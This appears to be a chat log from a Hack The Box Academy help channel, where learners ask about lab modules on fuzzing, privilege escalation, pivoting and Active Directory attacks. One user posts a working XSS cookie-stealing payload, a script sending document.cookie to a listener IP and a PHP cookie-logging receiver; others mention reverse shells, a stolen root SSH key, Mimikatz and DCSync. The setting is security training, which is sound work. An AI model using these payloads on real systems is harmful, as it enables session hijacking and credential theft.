that's the common one, you can try other file names and check the response
a response of 200 means the page exists
yeah I know
Actually look, my command states using the web-extension file to display what extensions exists but only phps outputted, there wasnt any i found to be fair
is it possible to bypass this, pw_hash gives sha256
try -e .php
because you aren't fuzzing the right place, again the directory will not contain the extension
got it
first try the extensions, if there's one that returns 200, you can use that to continue to fuzz the page
yeah ofc, im just trying my best to look for the correct extension
nvm ignore that
stuck forever, I can't find a way to bypass it
what are u trying to do
bypass login without a password
well,,,, I don't think you can unless you SQLI or able to run code backend usually tries to prevent it
this is from type juggling section
Oh not sure myself then apologies
I havent went to that topic im not really a programmer, I can read code but cant write it
its either that or this we have to exploit one
it says allow access to "all" our admin user, never mention anything about the convention of names
you should include the module and section name and where you're stuck at so that people can help you, instead of just posting screenshots without any context
i did here
I think I have to bypass the login somehow with a username containing admin but I can't find which admin user has a password with that numeric hash
In the Pennyworth module…. Very easy, getting started. I was curious as to why it is that nothing happens when I start the netcat listener and have everything matched up to execute /bin/bash/ in the Giddy reverse shell script code.. whoami yields nothing. I’ve tried several different ports. It acts like I’ve just done nothing at all. No confirmation of connection or anything.
Hello! I am trying to solve 2nd part of challenge in Privilege Escalation. I can see I am working as user2 and I can see flag.txt is in root/flag.txt, but I don't have permissions. There are no commands I can run as user2 as root. However, I can see I have access to id_rsa under /root/.ssh/ on remote. I am hard time moving onwards from here.
have you tried changing into the directory?
using "cd"
also linux fundamentals you need to use the mousepad command with the filepath to open it
wait you're trying to open the flag.txt right, oh wait this is windows
try the notepad command in the windows console to try open it
Are you replying to my message? 😄
ye
It is linux
I cannot just cat or vim flag as I have no permission
sudo?
I need to be sudo, but I am not sure how to get that privilege from user2 to sudo...
if you have access to root's ssh directory what can you do?
anything!
hm, I can check that, but I doubt that as first part of challenge was from user1 to get to user2...
well I can see the id_rsa
I can copy that id_rsa to my local
I did copy it and replaced my current id_rsa with the one copied from /root/.ssh/id_rsa. Then I tried to ssh to root via ssh root@ip -i id_rsa
but it didn't work
why did it not work
permission denied public key
What can cause this? If I go to the webserver through webbrowser it works fine
Don't know why it shouldn't be writeable, I'm in the user's own dir
temp doesnt work either
make sure you're using the right key, you don't have to overwrite your own key file, just save it to a file, the name doesn't matter as long as you specify it
-o /file.exe writes it to C: root
did you get the answer
Ooof rookie mistake... thanks :D Btw. since LaZagne runs in a new window, would it be possible to run it through CLI only?
hmm I am still getting the same error message
Nice, was because I was using cmd. PS works
are you using the right port?
I just tried to pass port and I am getting different message with unprotected key
got it
I forgot to chmod the file with key inside
Thanks for guidance
it seems like so many people got stuck on this and there is no answer in discord history :( and forum
OH nvm found it wow
for future people: check every function and every value in loose comparison
Heyy
We need a Splunk module 🥹
can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
I try to get the reverse shell as explained, the reverse shell works when I just use a normal .exe created with msfvenom, but when I use the C# code it doesn't work
no mod here who has done the module?
In my case, the reverse shell was only established for a moment, but it was enough to get the flag
SQLi fundamentals gave me a headache 😵💫
I liked it hehe
Last year, I passed EC Council’s little course on SQLi. So I was not expecting the ass kicking HTB gave me lol
but you got the message from the handler that the session was opened?
Yep
Sure
thanks
that's good to hear that it was more challenging for you. When I got into it I didn't have that much exposure to the subject but was really interested in any injection type attacks like that.
Don’t get me wrong, I think it’s really cool. And it took me thinking about it like “terminal commands with extra steps” for it to really click. But yeah. It was much more challenging than my previous exposure to it.
HTB education so obvi top-tier.
I like the whole trying to guess what it looks like on the other end of the input.
HTB is an excellent service to have for such a nice price too. I get really excited when I get to come home to learn.
Hey what’s up 👋
All good how about youu
Having said this, auth bypass has always been ez pz for me. But db enumeration on a webpage really tripped me up. I’m much more comfortable in a command line environment, but that just means that’s the area I need to focus on strengthening.
I’m addicted to HTB academy lol I work through modules from like 8am-3pm Monday-Thursday.
ffuf, page fuzzing. Only .phps exists?
and status code is 403 so it wouldn't really work
my input
Shouldn't you check for other file names/folder names too? Here you're just checking for files called index with different extensions
I just realized there's an Assembly Language module, that's so awesome. HTB Academy really is a great resource
I’m new to cybersecurity and I wanted to know were should I start on HTB? Academy labs or CtF
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
^
For some reason when I use HUD mode in ZAP and open my browser I try to put the domain in scope but the target doesn't change, neither does the text
Yes same here I can forget to eat sometimes.
Yeah it's easy to lose track of time when you're engrossed in a module
I actually did that today! Haha. Found a bag of Chex mix though lol
it feels good to be that focus lol
Yeah, I especially enjoy it as it gives my ADHD hyperfocus something to latch onto lol
Stuck at broken authentication skill assessment any one can help🫤
I got the username and password
But i stuck at 2FA otp
I'm guessing you've tried bruteforcing OTP with no results right? So go back through your notes from the module and try other ways other than bruteforcing OTP. Register a new account and see what a normal login request looks like and go from there
Did you chain this by editing the Ubuntu proxychains conf file?
https://academy.hackthebox.com/module/103/section/1008
URL being used
http://10.129.113.130/hijacking/?fullname=test&username=testtest&password=test&email=test%40test.com&imgurl=%22%3E%3Cscript+src%3Dhttp%3A%2F%2F10.10.15.121%3A8080%2Fscript.js%3E%3C%2Fscript%3E
script.js
```javascript
// cat script.js
new Image().src='http://10.10.15.221/index.php?c='+document.cookie
```
index.php
```php
<?php
// cat index.php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
```
PHP server command and logs
```
sudo php -S 0.0.0.0:8080
[Thu Jun 13 01:42:18 2024] PHP 7.4.33 Development Server (http://0.0.0.0:8080) started
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Accepted
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Invalid request (Malformed HTTP request)
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Closing
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 Accepted
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 [200]: CONNECT google.com:443
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 Closing
```
Any idea what I am missing, don't seem to be receiving any relevant requests in php server logs even after I run the URL
your script isn't calling your ip:8080
also i suggest, if you're using pwnbox, to specify your tun0 ip -- as the other Interface is public facing
hence why you're getting those rando public IPs connecting
What are you talking about?
Can anyone help me with SPN jacking on DACL II? the impacket-getST command isn't working, it fails due to authentication errors. I feel like the hash is wrong. Am I just doing something wrong? This is the "Abusing Live SPN Jacking from Linux" section. Had no issues doing it in Windows.
Can someone nudge me on Attacking Domain Trusts - Child -> Parent Trusts - from Linux
I am trying to find the hash from this question
Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.
I was able to get the reverse shell through psexec.py and have searched everywhere in the shell but I can't find anything that can help me get the hash. I did find bross ||1179: INLANEFREIGHT\bross (SidTypeUser)|| but not sure where to go from there.
returning to HTB after a break so please bear with me haha
what's the exact error
Let me fire the module up and get it
did you psexec to the right domain's DC?
||172.16.5.5||
I don't remember the IP, your target is the INLANEFREIGHT.LOCAL domain
did you do it manually or use raisechild.py
Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid)
yeah that means whatever credentials you gave it is wrong
did you complete this section?
yeah, you can dm but I don't have notes for that question
can anyone help me with bloodhound. I don't get why but for some reason the zip file from SharpHound is not getting uploaded to my bloodhound. Neo4j is running fine. It's always getting stuck in the same way as shown in the screenshot. I'm facing this problem for a long time. I was only able to successfully upload the files 2-3 times in the last 4 months. Can anyone help me with what I should do?
The Footprinting module is the only module that covers external stuff in the Penetration Tester Path, yeah?
your sharphound version is not compatible with the old bh you're using, when you run sharphound it will tell you the minimum version required
use v2.0
all the web stuff are also external
@next bronze the other day I was on the pivoting module and you recommended learning ligolo-ng to me. Is there a resource you'd recommend or should I just reference their GitHub?
Got it. By web stuff, I assume you're referring to the section that comes after Active Directory Enumeration & Attacks?
https://www.arth0s.tech/posts/ligolo-ng/
there's also a 20 min video on youtube but I can't remember who its from
yeah web attacks is a big vector to get initial foothold
Thanks. Btw would you recommend I do any of the pro-labs prior to the CPTS exam? Or just doing a blind AEN is sufficient?
For some background on me, I've never done a full-blown pentest.
many people who passed the exam have not either, you'll be fine
I'm using bloodhound 2.4 and also do you think if the version of sharphound is old that can cause an issue?
I wrote a blogpost about it that covers these and more
https://xre0us.io/posts/cpts-oscp-and-you/
Review and comparison between the CPTS and OSCP certifications, and some tips on passing the exam.
your version of sharphound is too new for your bh
I'm afraid that's the latest version of bloodhound that's available.
Do a report for AEN, use the CPTS template. At least that way you know what a mess you are getting yourself into.
Got it. Am I allowed to share the report in #cpts for peer-review?
documentation is the hardest part of the path imo
I haven't even gotten there, and I just know you're right 😂
yes so use an older version of sharphound, or use bh community edition
pretty sure older versions of bh won't support certain permissions etc, so you may miss some attack vector(s) using old stuff
You can ask, someone will probably agree to review it.
Noted. Thanks.
Just don't post it there, ask for a review and dm it.
Ah ok, got it.
Thanks for clarifying.
You mentioned that you spent a month after you completed the path to do boxes and the pro labs (Dante and Zephyr). How long would you say just the pro-labs took?
couple of days for dante, about a week for zephyr
if I remember right, it's been a while
hey guys do you know if you can filter based on response in zaproxy?
That's a really detailed blog. Very informative.
For Active Directory Enumeration & Attacks -> Privileged Access
If you can't connect with SSH to 172.16.5.150 through the Windows host cf
It turns out that, on my end, the host with the SSH server (172.16.5.150/ACADEMY-EA-DB01) can't access my clipboard if I ssh with powershell through the RDP session (ACADEMY-EA-MS01).
So trying to copy paste the htb-student password doesn't work.
But manually typing its password does
my bad yeah i did that, i did it manually
you can use the system shell to dump the NTDS or use the ticket to DCSync
ill try that
Module: Broken Authentication
hey guy has anyone done the module broken authentication? I need some one to check if this command is good or not
try adding +cliboard to your xfreerdp command, also pasting the password into notepad then copy/pasting from there should work
I already have a working bidirectional clipboard with both Remmina and xfreerdp, so it should work, nonetheless I tried:
- copy pasting into notepad (with both)
- turning off clipboard sync through Remmina
- +clipboard option for xfreerdp
Nothing worked. It's not that big of a problem though, because it can be quickly solved with a port forwarding. But yes it's weird.
PS: this command to "pipe" a string to the clipboard gives this result: `echo 'a'|xclip -selection c`
copy paste to keystrokes
```
Clipboard := Clipboard
SendInput %Clipboard%
return
```
this is an autohotkey script that should take your clipboard input and output keystrokes
there's also xdotool for linux
@cloud urchin Neat! Thanks
can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
I try to get the reverse shell as explained, the reverse shell works when I just use a normal .exe created with msfvenom, but when I use the C# code it doesn't work
Hi, I am still doing the Pivoting module. I have got the final flag on DC. However, I had to take help from youtube video for this. What I am trying to do is scan an open port on DC through 3 proxies. I have set up dynamic port forwarding so that I can chain proxies using proxychains. To make sure that the proxy configuration is correct, I need one of the open ports. So, if anyone knows it, please DM me
All I am getting right now is socket error or timeout! for some of the standard service ports of Windows.
The setup that has allowed me to get the final flag, must require the DC to open a certain port to provide that service, isn't that right?
https://academy.hackthebox.com/module/147/section/1320 - Password attacks, Linux.
Is this a false positive or how? From my research I could understand that you have to make a mutated password list, but for who? Will or Kira? And how would I know if I didn't use the hint..
I have tried using Will's password for all services running, but without luck.
does anyone know a way to send multiple requests to exploit race conditions
in the module they use burpsuite turbo intruder but that works only for a single request, i wanna send different request
Maybe try what is in the section?
Module: PIVOTING, TUNNELING, AND PORT FORWARDING
Section: RDP and SOCKS Tunneling with SocksOverRDP
Can someone explain to me why we need to configure Proxifier and all that in this section? Why can't we just RDP to the remote Windows host from the Windows pivot host directly?
Module attacking web apps with ffuf
Question: Try to use what you learned in this section to fuzz the '/blog' directory and find all pages. One of them should contain a flag. What is the flag?
Problem: Tried fuzzing in "/blob/FUZZ", I do not get a webpage at all
bottom is my query
🤔 so many 200 statuses but no webpage to be discovered, it's weird
Am i supposed to get the file extension first? before i can fuzz a webpage?
I found the open ports by using test-netconnection command from pivot2 machine. However, when I scan against the same ports using proxychains, it shows the ports as closed! Why???
proxychains needs -sT right
wtf
Yes I'd love to, but it requires initial access. Sometimes I don't understand how you would solve the challenge without the hint.
In this case; how would I know there is a Kira account and that it's assumed PW is xxxx?
there's like literally no available extensions
Oh yes I totally agree, without the hint it's close to unsolvable, or we would have to wait ages and do a brute force
i did, and apparently home.php wasnt the correct one
sending result
OH MY GOD IK WHY
LMAO THE DIRECTORY ISNT RIGHT
Alright good to know
The module says 8 hour duration but I think I spent well over that already, and I'm half way through
ezerino
great job
Yes. I have added the flag
~~Hello all! I have a question about Module 57 Section 491; specifically the second question to obtain the ftp flag. I was able to su to the other user ||m.gates||, but when I attempt to ftp, I get the ftp prompt but every command results in "Not connected", except exit which does indeed exit. What basic thing am I missing?
EDIT: the connection times out
ftp: connect: Connection timed out~~
NVM!
And also you're not using the command correctly, like the command here #modules message
will request /blog/.asp, /blog/.aspx etc. That's not what you want right? You want to at least add some file names, and maybe even folders?
Like here:
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS
yes i just realized i got the flag correct
Don’t know
Sometime it come as “filtered” too
for nmap?
Yeah
They are asking the q #modules message
oh is that not an nmap module?
I don’t have the module but when I did chisel and ssh dyn port forwarding in another course it unpredictably results in “filtered”
how are u scanning?
A generic command like proxychains nmap -sT -Pn -n <ip> and the disable ARP flag I've forgotten
Scanning through Ligolo is very reliable though
sudo nmap -p- -sS -T4 -v -sV -A --min-rate=2500 <ip> try this
a bit aggressive but personally this is all i ever needed for nmaping
-sS will break with proxychains
Hi all, please can someone help me, I'm busy with the XSS module, and I have been writing exactly the same script that is in the notes for the phishing section where I have to insert a login form but as you can see from the picture it's not taking the full command, and for some reason my client side looks nothing like the demonstration. Can someone please explain where I am going wrong
This is the payload that I'm using which is exactly the same as the code in the demonstration
oh oops yeah ignore that then
It shows "closed"
Don’t know sorry
which section
When using two proxies, scan against Pivot2 from attack box using target machine and Pivot1 gives correct result. But when I add the third proxy, it doesn't work.
Phishing and stealing credentials
DM
@fathom pendant @cloud urchin Can you guys please help? I have been stuck for days now 😦
if you're using nmap you shouldn't be scanning over proxychains
nmap works fine over proxies, you just need to set the right flags for it
why are you doing triple pivot? most you need to do for that module is a double pivot
Hey can I DM you?
I mean if I had to scan ports on DC, I would have to do this right?
I'm pretty sure double pivot will do for the module, unless the module has 3 different subnets which I don't remember it having
@next bronze ?
It will be spoiler for others the question that I want to ask
I don't have notes on this, it's just based on memory and experience
but I'm telling you that there isn't a triple pivot, don't overthink it
we've got an issue with this, the problem is speed is not going to be reliable, and there's a chance of you being detected
speed is a major factor with nmap
reduce the number of ports you're scanning if speed is a concern
@next bronze I'm on the same double pivot module. Could you please explain this to me ^?
I've never used socks over rdp outside of that module so I can't help you here
Hello! Has somebody here done the module INTRODUCTION TO DESERIALIZATION ATTACKS?
please dm me if you have
I'm actually referring to the concept of double pivoting. I don't get that part.
that's just gonna be an issue then if i want to scan all ports
u should scan for all ports anyways
oh, you can RDP to the remote Windows host from the Windows pivot host directly, but sometimes you might want to run tools from your linux host or the pivot host has limitations, then you can set up a double pivot
get the common ports, then do your enum on those while nmap scans all ports. you can have multiple things running
got it
What exactly are the commands in that section doing? It's not very well explained imo.
[CDSA][1 of 2] Intrusion Detection With Splunk (Real-world Scenario):
https://academy.hackthebox.com/module/218/section/2357
Hi guys/admins. I did some black box threat hunting and found some interesting stuff on the dataset for the said module that were not asked in the module exercises, as well as other things that needs to be verified such as:
||1. After the credential dumping via comsvcs.dll's minidump function (2022-11-06 11:44:07) on host (DESKTOP-EGSS5IS), the adversary proceeds in executing psexec related commands to enumerate the other host (10.0.0.47, DESKTOP-UN7T4R8), commands such as hostname, whoami or any generic situational awareness commands as well as network enum ones (2022-11-06 11:57:27), though I saw one command on 10.0.0.47 related to the commandline: net user waldo Password@123 (2022-11-06 11:12:32). What's not clear to me is the net user command. Would it be right to assume that prior to the dumping at DESKTOP-EGSS5IS, waldo created the user waldo with password Password@123 via net user waldo Password@123, since this event took place first, before the dumping of credentials?
- comsvcs.dll's minidump function (2022-11-06 11:44:07) on host DESKTOP-EGSS5IS
- net user waldo Password@123 (2022-11-06 11:12:32) on host DESKTOP-UN7T4R8
[!] This comes to a fact as well that after the credential dumping event there's one successful login event from DESKTOP-EGSS5IS for the user waldo against DESKTOP-UN7T4R8, but that is at 2022-11-06 11:59:59, which is normal given that there's credential dumping that took place, but I still can't figure out how net user waldo Password@123 was executed on DESKTOP-UN7T4R8 where in fact the dumping just took place after the net user related event?||
[CDSA][2 of 2] Intrusion Detection With Splunk (Real-world Scenario):
https://academy.hackthebox.com/module/218/section/2357
Hi guys/admins. I did some black box threat hunting and found some interesting stuff on the dataset for the said module that were not asked in the module exercises, as well as other things that need to be verified, such as:
||
2. As for other attacks, I've seen notepad.exe and cmd.exe were set to be a persistence mechanism as initiated by randomfile.exe on host DESKTOP-EGSS5IS.
cmd.exe and notepad.exe were used to escalate privilege from user waldo > NT AUTHORITY\SYSTEM upon their execution as a persistence mechanism on 2022-11-08
(Please confirm this finding)
3. I saw SharpHound.exe and file.exe being fetched by the adversary via PS' Invoke-WebRequest on DESKTOP-EGSS5IS. As for tools used against the domain and its users, as of now I don't see anything other than these 2 (Please confirm this finding)
4. Invoke-DCSync.ps1 was downloaded on DESKTOP-UN7T4R8. (Please confirm this finding)
5. Was able to see a DCsync attack related artifact via Windows Event ID 4662 user waldo being the culprit for that. Can you confirm if the DC controller is host WIN-HSRME76TRAD.uniwaldo.local? (Please confirm this finding)
6. Aside from SharpHound.exe being invoked on DESKTOP-EGSS5IS and Invoke-DCSync.ps1 invoked on DESKTOP-UN7T4R8, are there any other steps that I've missed or any major attacks against the DC? (Please confirm this finding)||
I get that the SocksOverRDP is doing SOCKS tunneling over RDP, and then the proxifier is used on the pivot host to forward traffic? So where does the double pivot play into this in that section, @next bronze?
there are multiple tools you can use for double pivot, as I've said I don't use socks over rdp so I don't remember a thing about what they're doing in that section
What do you want to know? Just ask your question. This increases the chance of getting help
I'm assuming double pivoting can be done with ligolo as well? I'll have to spend some time learning ligolo, maybe I'll use it for the skills assessment.
yes, it makes things a lot easier
Ligolo works for both linux and windows?
it can also be done with ssh or chisel, I wouldn't really recommend using socks over rdp tbh
it's good to know but terrible to use
yep
Ok, I'll look up some article on how to double pivot with chisel and ssh as well. I'm assuming it's the same concept as a single pivot though, just repeated?
I'm stuck on chal2, I got the payload and I also got the key to create the hmac, but I'm not having luck
yeah you just connect one tunnel to the other
chal2? Skills Assessments?
Hi, can anyone help me with "AD Enumeration & Attacks - Skills Assessment Part I" Question N°6 (||tpetty|| cleartext pass). I'm trying Mimikatz... I am stuck. HELP
yes man
you can find it with mimi, try some more options
Hi everyone!
I am new here and I have a question about Web Requests and how to run POST module.
I believe I am following all the steps given to me. Though I do not receive the same response the course tells me I should receive.
Will someone help me to find the answer?
How do I confirm the password using the "curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/"?
How to get the JSON data from the Storage?
Skill Assessment II?
This question?
Achieve remote command execution and read the flag.txt file
both, for some reason I'm not being able to generate a valid hmac
Yeah I feel like this should be easy. But I am following the steps given and not getting the right answer.
I don't know what else to try
You have to find out the exact version first
CodeIgniter
I have it, and used it in ||phpggc|| to get the payload
do I need to use also some function from codeigniter to get the hmac?
I have no idea what you mean by hmac, sorry.
You need the correct CodeIgniter code, nothing more
Which section
The part where I authenticate the cookie. That's where I'm having problems
I don't know if I've authenticated or not. Not a flashing sign telling me I did it that I am aware of.
Send me question or section
Firefox doesn't change as I do work in the parrot terminal
DM me
with ffuf is there a way to output only the status codes of 200?
-sc 200
thank you
Hi! I'm trying to list AD users using "enumdomusers" within rpcclient. Is there any way to redirect the output to a file? I tried the usual redirect > but it doesn't work. Can't seem to find anything on google either
can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
I try to get the reverse shell as explained, the reverse shell works when I just use a normal .exe created with msfvenom, but when I use the C# code it doesn't work
tee could work? rpcclient -U "" -N 172.16.5.5 -c 'enumdomusers'|tee enumdomusers.txt this works without -c
with -c you can just do as usual rpcclient -U "" -N 172.16.5.5 -c 'enumdomusers'>enumdomusers.txt
any mod here who can help?
asking for a while now
Thank you!!! I was trying to do it from within the rpcclient prompt. Lol. Couldn't figure out why I couldn't find anything on help
Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.
I'm stuck here even after using "sudo nmap <ip> -sC -p110,143,993,995 -sV"
I'm still not getting any answer